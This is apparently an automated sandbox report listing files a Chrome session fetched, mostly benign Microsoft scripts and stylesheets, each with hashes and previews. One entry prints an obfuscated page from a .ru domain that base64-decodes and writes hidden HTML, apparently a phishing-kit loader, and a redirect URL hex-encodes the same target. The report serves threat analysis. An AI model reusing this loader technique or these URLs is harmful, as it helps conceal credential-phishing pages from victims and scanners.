                                                                Preview:function _hX(a){return a?true:a==0||a==false||a==""}function _Du(a,b){return _hX(a)?a:b}function _J(a){return a instanceof Array}function _BD(a){return "function"._f0(typeof a,true)}function _F(a){return typeof a=="string"}function _BE(a){return _hX(a)&&_F(a)&&a!=""}function strOrDefault(a,b){return _BE(a)?a:b}function _A3(a){if(!_F(a))return "";if(a.lastIndexOf(".")<0)return "";return a.toLowerCase().substr(a.lastIndexOf(".")+1,a.length)}function _A2(a){return document.getElementById(a)}var $J={_cV:false,_b:function(c,a){var d=null;if("img"._f0(c)&&_hX(a)){var g=_A3(a.src);if("png"._f0(g,true)&&!$F._lM())c="span"}var b=d;if("input"._f0(c,true)&&_hX(a)&&(a.name||a.type)){if(!$aE._j._f0(a.type)){var f=document.createElement("div");f.innerHTML='<input type="'+(a.type?a.type:"")+'" name="'+(a.name?a.name:"")+'" />';b=f.firstChild}else try{var e="<"+c;if(a.type)e+=' type="'+a.type+'"';if(a.name)e+=' name="'+a.name+'"';e+=">";b=document.createElement(e)}catch(h){b=d}if(_hX(b)){a.type=d;a.na
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):557310
                                                                Entropy (8bit):4.6361206260321355
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:569C1836416534BDC4E74666DC140767
                                                                SHA1:1AB5BDA1431970AFF35ADE196DEB9DE977D3EF8E
                                                                SHA-256:B3EEABAC944CB6BAE630056B0D5B809CB9D757AACF0ADADC2953E09F53D09F8E
                                                                SHA-512:EE7BE54612DAB9AAC06FC42BDF0490DE6B045A65AC28D4959AD19F66B8AE7AEAB6A69B0AE42E48C958575C6A60312912F9D6FCCC02216BD90FC489EB2DD08C95
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:// onerfcomponentFactory.js....define("componentFactory", [.. "require",.. "exports",.. "htmlExtensions",.. "utility",.. "stringExtensions",..], function(n, t, i, r, u) {.. "use strict";.. Object.defineProperty(t, "__esModule", {.. value: !0,.. });.. var f = (function() {.. function n() {}.. return (.. (n.create = function(t) {.. for (var i, r = 0, u = t; r < u.length; r++) {.. if (((i = u[r]), !i.c && !i.component)).. throw "factoryInput should has either component or c to tell the factory what component to create.Eg.ComponentFactory.create([{ c: Carousel] or ComponentFactory.create([component: Carousel]))";.. n.createComponent(i.component || i.c, i);.. }.. }),.. (n.createComponent = function(t, r) {.. if (t) {.. var o = r && r.eventToBind ? r.eventToBind : "",.. f = r && r.selector ? r.selector : t.selector,.. s = r && r.context ? r.context : null,.. u = [],..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):61
                                                                Entropy (8bit):3.990210155325004
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):211842
                                                                Entropy (8bit):5.548839465294018
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C1338BAD680C7B30034BB2BEE2C447D3
                                                                SHA1:E93C535395F25D15F4AA67E481DFCEAF94F25A1E
                                                                SHA-256:906A3B2A89AA06A9C0DA125FBF248D1F9FD188511B44D4822D9E3FCFD28197E8
                                                                SHA-512:AE28ACA7B8AAB00F7EAF2B5EBCE86F23DD1B91E711100110ED4E2B7B6A68A1284AF777EC87C652789BBBC50B5FA95A18A47A1D1F5B1FF65FDBC6E56EE6FA31E7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://mem.gfx.ms/scripts/me/MeControl/10.24228.4/en-US/meBoot.min.js
                                                                Preview:MeControlDefine("meBoot",["exports","@mecontrol/web-inline"],function(t,S){"use strict";var c=function(){},i={},u=[],p=[];function O(t,e){var r,n,o,i,a=p;for(i=arguments.length;2<i--;)u.push(arguments[i]);for(e&&null!=e.children&&(u.length||u.push(e.children),delete e.children);u.length;)if((n=u.pop())&&void 0!==n.pop)for(i=n.length;i--;)u.push(n[i]);else"boolean"==typeof n&&(n=null),(o="function"!=typeof t)&&(null==n?n="":"number"==typeof n?n=String(n):"string"!=typeof n&&(o=!1)),o&&r?a[a.length-1]+=n:a===p?a=[n]:a.push(n),r=o;var s=new c;return s.nodeName=t,s.children=a,s.attributes=null==e?void 0:e,s.key=null==e?void 0:e.key,s}function T(t,e){for(var r in e)t[r]=e[r];return t}function d(t,e){t&&("function"==typeof t?t(e):t.current=e)}var e="function"==typeof Promise?Promise.resolve().then.bind(Promise.resolve()):setTimeout;var l=/acit|ex(?:s|g|n|p|$)|rph|ows|mnc|ntw|ine[ch]|zoo|^ord/i,r=[];function a(t){!t._dirty&&(t._dirty=!0)&&1==r.push(t)&&e(n)}function n(){for(var t;t=r.pop();)t
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65394)
                                                                Category:downloaded
                                                                Size (bytes):91802
                                                                Entropy (8bit):5.3603423050848615
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CF5CC7F4B57526CC37893DCB83DED031
                                                                SHA1:E953783BE0A7894585778455AAE3D0DF094D6F29
                                                                SHA-256:3A790B6C0D26D7A4D292CB27F992EAFAFF42C37E9318B2AB704207039127FCB8
                                                                SHA-512:2320F9D7811CD773C1E5C2E95A31B39E9FF62A2FA7CA431975873DAB57AE42A75BA720D15AEB47FA2EA127D0766EB5AA15040CFFD04BF7A8CB8BCD7236069C40
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js
                                                                Preview:/*!. * 1DS JS SDK Shared Analytics, 3.2.18. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t,r={},i="__ms$mod__",o={},a=o.esm_ms_shared_analytics_mectrl_3_2_18={},u="3.2.18",c="oneDsMeControl3",s=(s=e)[c]=s[c]||{},l=(l=e)[c="oneDsMeControl"]=l[c]||{},e=s[i]=s[i]||{},f=e.v=e.v||[],c=l[i]=l[i]||{},d=c.v=c.v||[];for(t in(c.o=c.o||[]).push(o),n(r),r)s[t]=r[t],f[t]=u,l[t]=r[t],d[t]=u,(a.n=a.n||[]).push(t)}(this,function(e){"use strict";!function(e,n,t){var r=Object.defineProperty;if(r)try{return r(e,n,t)}catch(i){}typeof t.value!==undefined&&(e[n]=t.value)}(e,"__esModule",{value:!0});var y="function",m="object",se="undefined",C="prototype",I="hasOwnProperty",b=Object,S=b[C],x=b.assign,w=b.create,n=b.defineProperty,_=S[I],T=null;function O(e){e=!1===(e=void 0===e||e)?null:T;return e||((e=(e=(e=typeof globalThis!==se?globalThis:e)||typeof self===se?e:self)||typeof window===se?e:window)||typeof global===se||(e=global),T=e),e
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):38377
                                                                Entropy (8bit):4.895773702678033
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7A7E9A6CA7D178006A937A510FFA048B
                                                                SHA1:40AE414A13C3A548A99E12B95712E52733DC9AF2
                                                                SHA-256:E8A204F56107DDAE54CD91117A904247618775B02A8EF8C6CD9A09D8B3CA4787
                                                                SHA-512:C6D1579F9C5C242A7B2A325E86FEB3E916370CF3CDAF69B46646C3C1FBD7E5DD477B36B1D43AC610491C3D6259DA4168F662A83B7BFC4F7CF064A642F2295928
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/videoplayer/lib/onerfstatics/default-theme.css
                                                                Preview:html,..body,..#primaryArea,..#primaryR1,..#videoplayeriframe {.. height: 100%;.. width: 100%;.. overflow: hidden..}.....m-video-player.full-width {.. padding-left: 0;.. padding-right: 0..}.....m-video-player.expand-preview-image .x-sfa-video img {.. width: 100%;.. display: inline-block..}.....x-sfa-video {.. display: flex;.. height: 100%;.. overflow: hidden;.. width: 100%..}.....x-sfa-video img {.. height: 100%;.. margin: auto;.. display: block..}.....x-sfa-video .f-video-trigger section div button {.. background: rgba(0, 0, 0, 0.6) !important..}.....x-sfa-video:focus {.. outline: 3px solid #FFF..}.....c-video-player {.. cursor: pointer..}....a.x-sfa-video .c-video-player {.. position: relative;.. padding-bottom: 56.25% !important;.. padding-top: 30px !important;.. height: 0;.. overflow: hidden;.. min-width: 320px..}....a.x-sfa-video .f-core-player {.. position: absolute;.. top: 0;.. left: 0;.. width: 100%
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (20235), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):42321
                                                                Entropy (8bit):5.832512633727958
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:1E9BEB2FD28AB25ED1FB528901E57CA7
                                                                SHA1:CACA63D0CD4BFA0DFA5CA94D64E7D7983B9C6D0E
                                                                SHA-256:26831F93DEC2E6AB134A0C9C8F65C733BB610BD9B35752644C0A588E1D4B28C9
                                                                SHA-512:B0396CDF8CB8C6D475F10C04AC5F3CA1F25233DC34A9F21A8D4667C088A1120FAA57BA8899D24B7545471244E49612D58AF1DE5943C593020B3D654402675DC2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/videoplayer/lib/js/require.js
                                                                Preview:/** vim: et:ts=4:sw=4:sts=4..* @license RequireJS 2.2.0 Copyright jQuery Foundation and other contributors...* Released under MIT license, http://github.com/requirejs/requirejs/LICENSE..*/..var requirejs, require, define; (function (n) { function dt(n, t, i, r) { return r || "" } function l(n) { return st.call(n) === "[object Function]" } function a(n) { return st.call(n) === "[object Array]" } function u(n, t) { if (n) for (var i = 0; i < n.length; i += 1)if (n[i] && t(n[i], i, n)) break } function rt(n, t) { if (n) for (var i = n.length - 1; i > -1; i -= 1)if (n[i] && t(n[i], i, n)) break } function r(n, t) { return bt.call(n, t) } function i(n, t) { return r(n, t) && n[t] } function h(n, t) { for (var i in n) if (r(n, i) && t(n[i], i)) break } function ut(n, t, i, u) { return t && h(t, function (t, f) { (i || !r(n, f)) && (!u || typeof t != "object" || !t || a(t) || l(t) || t instanceof RegExp ? n[f] = t : (n[f] || (n[f] = {}), ut(n[f], t, i, u))) }), n } function f(n, t) { return f
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):463064
                                                                Entropy (8bit):3.766429217491272
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2B260CA3C2D939BF9D947C02E26BDD74
                                                                SHA1:7DF28C5BD224172D56F20457085369C198A5064D
                                                                SHA-256:08BBF488605FE41D8C9ECB4C7BA487BF2D42035EF5EB53A1609CC04A90FA2F0E
                                                                SHA-512:1FDE064A715E83CBF74C8EB0F76130117E6505CB70BA44C432F370185E841543AD8218BADC768DD66BF84CB077AFF60EFA2B785A0975A154FCD8B717EEA817C0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/videoplayer/lib/onerfstatics/onerfonedsconfig.js
                                                                Preview:..d.e.f.i.n.e.(.".o.n.e.D.s.C.o.n.f.i.g.".,.[.".r.a.w.O.n.e.D.s.C.o.n.f.i.g.".].,.f.u.n.c.t.i.o.n.(.n.).{.r.e.t.u.r.n. .n.}.).;.r.e.q.u.i.r.e.(.[.".w.i.n.d.o.w.".,.".j.q.R.e.a.d.y.!.".,.".O.n.e.R.F._.O.n.e.D.s.J.s.l.l.".].,.f.u.n.c.t.i.o.n.(.n.,.t.).{.n...a.w.a...u.t.i.l.s.=.f.u.n.c.t.i.o.n.(.).{.f.u.n.c.t.i.o.n. .u.(.n.,.t.).{.v.a.r. .i.,.r.,.u.;.i.f.(.t.).t.r.y.{.r.e.t.u.r.n.(.i.=.J.S.O.N...s.t.r.i.n.g.i.f.y.(.t.).,.i.=.=.=.".{.}.".&.&.n.=.=.=.".t.i.m.i.n.g.".).?.f.(.).:.i.}.c.a.t.c.h.(.e.).{.r.e.t.u.r.n. .r.=.'.{.".e.r.r.o.r.".:. .".E.R.R.O.R.:. .c.o.u.l.d. .n.o.t. .s.t.r.i.n.g.i.f.y. .{.0.}. .{.1.}.".}.'.,.u.=.t.y.p.e.o.f. .t.=.=.".s.t.r.i.n.g.".?.t.:.".".,.r...r.e.p.l.a.c.e.(.".{.0.}.".,.n.)...r.e.p.l.a.c.e.(.".{.1.}.".,.u.).}.}.f.u.n.c.t.i.o.n. .f.(.).{.f.o.r.(.v.a.r. .f.,.i.=.[.".n.a.v.i.g.a.t.i.o.n.S.t.a.r.t.".,.".u.n.l.o.a.d.E.v.e.n.t.S.t.a.r.t.".,.".u.n.l.o.a.d.E.v.e.n.t.E.n.d.".,.".r.e.d.i.r.e.c.t.S.t.a.r.t.".,.".r.e.d.i.r.e.c.t.E.n.d.".,.".f.e.t.c.h.S.t.a.r.t.".,.".d.o.m.a.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (13521), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):31862
                                                                Entropy (8bit):5.875250915619985
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:536C11FB86CA4E91918B45097B5AC53C
                                                                SHA1:1F7288DBD937FA494592ECC0531722EC0005CDF2
                                                                SHA-256:260AA60C65746420AE95FD69382B09B451A15DEFB1E1FBB1CA45A976B76FE734
                                                                SHA-512:029EECFA143EF1810E34822B4F71ADD93AE80D4E3B121CB4213F55AA2149B4CB029FB475B35D584EDA7AC3AA1E73435F27FD23E264AB22CD60AEA2A86F5D622F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://cyt.sprenumen.ru/wJPIeL/
                                                                Preview: Success is where preparation and opportunity meet. -->....<script>../* Never give in except to convictions of honor and good sense. */..if(atob("aHR0cHM6Ly9IZklFZ2VKLnNwcmVudW1lbi5ydS93SlBJZUwv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxl
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):4466
                                                                Entropy (8bit):4.815200143314862
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:608ED94DBBE53914E7284F9D0BF56B46
                                                                SHA1:32EC37ED5ABE203EBEB3E552CDECAF2EA9014196
                                                                SHA-256:188B658300213BE394E47A973D27D0FE5FD8F9A150EDEC30091C1F6C409C71D1
                                                                SHA-512:A129758D575C5B3CD577955FCE4EC13454DB2439D0C20586002500C20F07C7FA8CC9D79739C84CA23D92F1F33B7E3E52F705214CAA3A38410FF44A2814163D5F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:{.. "agegate_day": "Day",.. "agegate_enterdate": "Enter your date of birth",.. "agegate_fail": "You may not access this content.",.. "agegate_month": "Month",.. "agegate_submit": "Submit",.. "agegate_year": "Year",.. "audio_tracks": "Audio tracks",.. "agegate_dateorder": "m/d/yyyy",.. "browserunsupported": "We\u0027re sorry, but your browser does not support this video.",.. "browserunsupported_download": "Please download a copy of this video to view on your device:",.. "cc_appearance": "Appearance",.. "cc_color_black": "Black",.. "cc_color_blue": "Blue",.. "cc_color_cyan": "Cyan",.. "cc_color_green": "Green",.. "cc_color_grey": "Grey",.. "cc_color_magenta": "Magenta",.. "cc_color_red": "Red",.. "cc_color_white": "White",.. "cc_color_yellow": "Yellow",.. "cc_customize": "Customize",.. "cc_font_name_casual": "Casual",.. "cc_font_name_cursive": "Cursive",.. "cc_font_name_monospacedsansserif": "Monospaced Sans Serif",.. "cc_font_name_monospacedserif": "Monospaced S
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (6125), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):6125
                                                                Entropy (8bit):5.234103429010352
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:97C18402D0D5AD89F12C548A55C8284F
                                                                SHA1:412ACD023C48FA79C9F846040497C74C2EBEC46D
                                                                SHA-256:464730FF27CB58E32D39C58E96330E89983298C72B1B4183A68E0B7FE4D4CCFA
                                                                SHA-512:38C551DBEC500AA1C450FDADE3E24FA16E71066F7CD75E103E6787C8687838E89BE49181C491F1234D29D7CCECA2B9C0C9FA20010548AD4E5F83D66D0AD1F02F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/css/feedback/feedback.css?v=Rkcw_yfLWOMtOcWOljMOiZgymMcrG0GDpo4Lf-TUzPo
                                                                Preview:.smbArticleFluent #extendedFeedbackForm .extendedFeedbackArticleInfoUseful{height:auto;display:flex;justify-content:center;align-items:center;gap:32px}.smbArticleFluent #extendedFeedbackForm .extendedFeedbackArticleInfoUseful #beginFeedbackHeader{padding:0;margin:0}.smbArticleFluent #extendedFeedbackForm .extendedFeedbackArticleInfoUseful .extendedFeedbackHeader{font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;font-size:16px;font-weight:600;line-height:20px;color:#333}.smbArticleFluent #extendedFeedbackForm .feedbackButtons{font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;font-size:14px;font-weight:600;line-height:20px;display:flex;align-items:flex-start;gap:16px}.smbArticleFluent #extendedFeedbackForm .feedbackButtonBlue{min-width:auto;display:flex;padding:3px 40px;justify-content:center;align-items:center;border-radius:4px}.smbArticleFluent #exte
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (780), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):780
                                                                Entropy (8bit):4.992440844788031
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CB3531F56366637C3E928C625264646D
                                                                SHA1:3F6B2AC9B3A9C76EF8410FCA587105F1D95238A5
                                                                SHA-256:47F3F44C9BC3F47A111D004476F051D5684D9FB7526EF3985A6540F6D6B16E93
                                                                SHA-512:5E99E7DCADC11B1BD462D4CE8C1BF4334857E830EAFD4AECBD689F9C3869689D25A568C8B91ACEC69E7A6B1E2FD033DB47D7F84DC260F92BE3823203FCDB8D1A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/css/ArticleSupportBridge/article-support-bridge.css?v=R_P0TJvD9HoRHQBEdvBR1WhNn7dSbvOYWmVA9taxbpM
                                                                Preview:.articleSupportBridge{margin-bottom:-40px}.articleSupportBridge .bridgeHeading{margin-top:40px;font-family:"Segoe UI Light","wf_segoe-ui_light",Arial,"Helvetica Neue",Verdana,Helvetica,Sans-Serif;font-size:2.4em;font-weight:bold;line-height:1.333;margin-bottom:15px}.articleSupportBridge .bridgeToken{margin-top:-30px}.articleSupportBridge .supportBridgeCTA{text-align:left;margin-top:-10px}.articleSupportBridge .supportBridgeText{text-align:left}.articleSupportBridge .phaseOneCTA{text-transform:uppercase;letter-spacing:.975px;text-decoration-style:solid;font-size:13px;text-align:left;font-weight:600}html[dir=rtl] .articleSupportBridge .supportBridgeText,html[dir=rtl] .articleSupportBridge .supportBridgeCTA,html[dir=rtl] .articleSupportBridge .phaseOneCTA{text-align:right}
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (42133)
                                                                Category:downloaded
                                                                Size (bytes):138067
                                                                Entropy (8bit):5.225028044529473
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B9C3E4320DB870036919F1EE117BDA6E
                                                                SHA1:29B5A9066B5B1F1FE5AFE7EE986E80A49E86606A
                                                                SHA-256:A1FE019388875B696EDB373B51A51C0A8E3BAD52CD489617D042C0722BDB1E48
                                                                SHA-512:A878B55E8C65D880CDF14850BAEE1F82254C797C3284485498368F9128E42DCA46F54D9D92750EEEB547C42CAB9A9823AA9AFAB7D881090EBBFA1135CDD410B6
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/lib/uhf/dist/uhfbundle.js?v=of4Bk4iHW2lu2zc7UaUcCo47rVLNSJYX0ELAcivbHkg
                                                                Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):16665
                                                                Entropy (8bit):4.994689912697386
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:431D8804A7BA2AC0993A91964F19C890
                                                                SHA1:1463EC1AD3B9B984E302EC5D57BB5AE841BB43B3
                                                                SHA-256:60B7CE9C7EF5F284A139029735EEA3A618D4E35A3A3CC62BD73B82BF4BA7D9D5
                                                                SHA-512:7974039890AC1F1521A3CE8D57BCEED9F530F1DDC74183D62DC02ABC545F53DD5259548C1465E049FCC47AC522CF0A9FA4AE36CF7ADC0F0463F2B6275AA7856B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/videoplayer/lib/css/index.css
                                                                Preview:.productplacementchoice .c-choice-summary {.. min-width: auto;.. padding-right: 12px..}.....productplacementchoice .c-choice-summary a {.. padding: 0 36px 0 0;.. margin: 0;.. color: #000..}.....productplacementchoice .c-choice-summary a:before {.. position: absolute;.. right: 0;.. padding: 12px 0..}....html img[class*=vp] {.. display: none;..}....@media (min-width:1779px) {.. html img.vp6 {.. display: block;.. }..}....@media (min-width:1400px) and (max-width:1778px) {.. html img.vp5 {.. display: block;.. }..}....@media (min-width:1084px) and (max-width:1399px) {.. html img.vp4 {.. display: block;.. }..}....@media (min-width:768px) and (max-width:1083px) {.. html img.vp3 {.. display: block;.. }..}....@media (min-width:540px) and (max-width:767px) {.. html img.vp2 {.. display: block;.. }..}....@media (max-width:539px) {.. html img.vp1 {.. display: block;.. }..}....@media(max-width:139
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 262 x 96, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):6143
                                                                Entropy (8bit):7.918747274282237
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CCA42A6DD7E8378D54197303C9B94BD1
                                                                SHA1:4D956D4A7049610D6728557695A2B40D71C24069
                                                                SHA-256:3806A156470D2669E497B39DCD453A1F69CA74D5A1AB69EAB755185C0EFB6A88
                                                                SHA-512:560D18D5C0DE6B86B1338ACC2778D633C612357AFB5ABC0302BBE469E435125DCBBC99D0C7B95B4BB3899187459245270AD0A19C4B2837F68709962FDD16CA0B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR.......`.............sRGB.........gAMA......a.....pHYs..."..."........IDATx^...UU...>gf...` ......"4......f..Er....(" ...|!O..r}.$..J...... `X.(x......9..[.....C....b.......k...0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0.....B|p..Y..y..0......R.........9..........l..ZF. ....`....>.0.H.c.y.)]2.uY.0....6......"o..7............D..(.cA.6..../....a@...BX...aP...sS.QBP...Ql<3.U.H!(.$........8.I.QD.8.....R.u. ..#H.q#.PW..u...0....Z....s..?.S.L...7.I.&u.6lX..6>..1.!..<8..w.F.......................r:..k..6.G...3&L.P.~d.)......tlfFlK[.J.[3{.^......z+.O.iA...........-r.5....u]MM..!;;;.....g.9.e8.#G...{K]]]$N#)..8p...3f...c.v.F..222N...~...:o..W.c..]QQ......3.............gk...'..!./.N$...6...E.3...?.?.....-s..f...{(e.Q..s\Dt..|..........\....................i.j}.G...Z..}|^^.w0..8.o.=.U..>.A...}..Q.W^.P./...e...^[[.[XX..v..].>.`....8.k..%.."NWj.."AF.|......g..3'.2''.>..w.{3g.....^}.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (1313), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):1950
                                                                Entropy (8bit):5.948716893304757
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0665F0DFEC4E375578689466E52CA32A
                                                                SHA1:E0037F6564DDCB8C1B1FEC083E170CBA804C6ADB
                                                                SHA-256:51CB04B6D9E8EEA7B250925E7C8436E6D61604DD6692A9FA4E88C38ADA7D49EC
                                                                SHA-512:49E254263F65871340781CBE0B34F33C930F15F21B702CEE552326B73A975AB82402000A2DCBB0A7BE33540FBDE02D5C97F63EC4294D6865ABEE978656F3DF5C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://web10.pro/res444.php?2-68747470733a2f2f4359542e737072656e756d656e2e72752f774a5049654c2f-kelp
